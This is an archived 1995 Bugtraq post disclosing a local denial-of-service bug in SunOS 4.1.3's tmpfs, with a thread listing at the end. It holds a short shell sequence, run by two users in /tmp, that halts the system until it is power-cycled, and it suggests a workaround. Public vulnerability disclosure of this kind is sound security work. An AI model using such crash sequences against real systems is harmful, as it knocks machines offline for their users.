Bugtraq mailing list archives

Another tmpfs bug in SunOS 4

From: Arfst.Ludwig () luxor in-berlin de (Arfst Ludwig)
Date: Sat, 2 Dec 1995 23:50:40 +0100


Hi!

Unprivileged users can crash the system such
that a power down power up cyle is needed.

Vulnerable OS is (at least) SunOS 4.1.3.

With the right permissions (umask) the following
sequence crahes the system. The kernel does not
panic, nor the abort sequece enters the boot
promt, the system is halted, need to power down.

8<------------------------- cut here -------------------------
user1> cd /tmp
user1> mkdir foo
user1> su user2

user2> mkdir foo/bar
user2> touch foo/bar/{plop,blup}
user2> exit

user1> cd foo
user1> mv bar ..
8<------------------------- cut here -------------------------

/tmp's permissons are drwxrwxrwt root wheel

I have not explored this bug very much because of the
ungracefully consequences.

Workaround:
Avoid using (the marvelous) TMPFS filesystems :-(
or (IMHO even worse) switch to Solaris 2 ?

Cheers, Arfst
______________________________________________________________________
  __
 (00)   Arfst Ludwig
  \`\/  E-Mail: Arfst.Ludwig () luxor in-berlin de
   ""   carpe diem

Current thread:

Cracked: WINDOWS.PWL Michael S. Fischer (Dec 05)
- Another tmpfs bug in SunOS 4 Arfst Ludwig (Dec 02)
  - Re: Another tmpfs bug in SunOS 4 Pete Shipley (Dec 07)
- little whole on Suns concerning /dev/kbd Arfst Ludwig (Dec 02)
  - Re: little whole on Suns concerning /dev/kbd Pete Shipley (Dec 07)
- Re: Cracked: WINDOWS.PWL [most services accessed by any version Rich Graves (Dec 05)
- fork() Alex Leipold (Dec 10)
  - Re: fork() Scott Barman (Dec 11)
    - Re: fork() Tom Jones (Dec 12)
    - SECURITY: Announcing Splitvt 1.6.3 Sam Lantinga (Dec 13)
    - Re: SECURITY: Announcing Splitvt 1.6.3 Alex Leipold (Dec 14)
  - Re: fork() JaDe (Dec 11)

(Thread continues...)